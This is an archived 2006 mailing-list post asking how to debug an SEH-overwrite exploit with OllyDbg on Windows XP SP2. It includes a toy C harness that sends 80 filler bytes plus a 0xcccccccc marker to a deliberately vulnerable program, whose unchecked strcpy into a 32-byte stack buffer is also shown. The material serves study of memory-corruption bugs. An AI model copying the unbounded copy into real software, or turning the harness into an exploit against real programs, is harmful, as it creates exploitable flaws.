Vulnerability Development mailing list archives

debugging seh overwrite


From: laphoo () gmail com
Date: 20 Mar 2006 02:19:57 -0000

Hello, I would like to know a way to debug a vulnerable program where I am overwriting the SE handler with my
address. I have OllyDbg as the just-in-time debugger. If my exploit buffer reaches the pointer to the next SEH record,
nothing happens. Now I was trying to put breakpoint instructions (0xcc) as a fake pointer, but OllyDbg ignored them, or I
did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I
overwrote something?

/* cl expl.c (Visual C++ 6.0) */
#include <stdio.h>
#include <string.h>
#include <process.h>   /* execve */
int main (void)
{
    char *app[3];
    char payload[84];
    unsigned int ptr = 0xcccccccc;   /* marker value placed after the filler */
    memset(payload, 0x00, sizeof payload);
    memset(payload, 0x41, 80);       /* 80 bytes of 'A' filler */
    memcpy(payload+80, &ptr, sizeof (int));   /* was &ret, which is not declared */
    app[0] = "vuln.exe";
    app[1] = payload;
    app[2] = NULL;
    execve(app[0], app, NULL);
    return 0;
}


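/* vuln.c */
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[])
{
    char string[32];
    /* require exactly one argument; argv[1] is NULL when none is given */
    if (argc != 2)
    {
        printf("Usage: %s <string>\n", argv[0]);
        return 0;
    }
    /* unbounded copy into a 32-byte stack buffer: the overflow under test */
    strcpy(string, argv[1]);
    printf("%s", string);
    return 0;
}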

Environment is Windows.XP.SP.2

I am sorry for my bad English.

Regards,
-- Laphoo

